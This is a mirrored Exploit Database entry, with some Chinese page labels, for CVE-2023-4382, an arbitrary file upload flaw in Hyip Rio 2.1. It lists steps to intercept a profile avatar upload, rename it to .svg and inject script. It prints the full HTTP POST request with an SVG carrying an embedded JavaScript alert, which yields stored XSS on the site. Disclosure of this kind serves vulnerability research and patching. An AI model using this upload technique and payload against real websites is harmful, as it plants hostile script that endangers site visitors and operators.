Hyip Rio 2.1 – Arbitrary File Upload

• Exploit Database
• 36 阅读

• 作者： CraCkEr
  日期： 2023-09-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51698/

• # Exploit Title: Hyip Rio 2.1 - Arbitrary File Upload
  # Exploit Author: CraCkEr
  # Date: 30/07/2023
  # Vendor: tdevs
  # Vendor Homepage: https://tdevs.co/
  # Software Link: https://hyiprio-feature.tdevs.co/
  # Version: 2.1
  # Tested on: Windows 10 Pro
  # Impact: Allows User to upload files to the web server
  # CVE: CVE-2023-4382
  
  
  ## Description
  
  Allows Attacker to upload malicious files onto the server, such as Stored XSS
  
  
  ## Steps to Reproduce:
  
  1. Login as a [Normal User]
  2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/user/settings
  3. Upload any Image into the [avatar]
  4. Capture the POST Request with [Burp Proxy Intercept]
  5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS]
  
  -----------------------------------------------------------
  POST /user/settings/profile-update HTTP/2
  
  Content-Disposition: form-data; name="avatar"; filename="XSS.svg"
  Content-Type: image/png
  
  <?xml version="1.0" standalone="no"?>
  <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
  
  <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
  alert("XSS by Skalvin");
  </script>
  </svg>
  -----------------------------------------------------------
  
  6. Send the Request
  7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] or right-click on the Avatar and Copy the Link
  8. Access your Uploded Evil file on this Path: https://website/assets/global/images/********************.svg
  
  
  
  [-] Done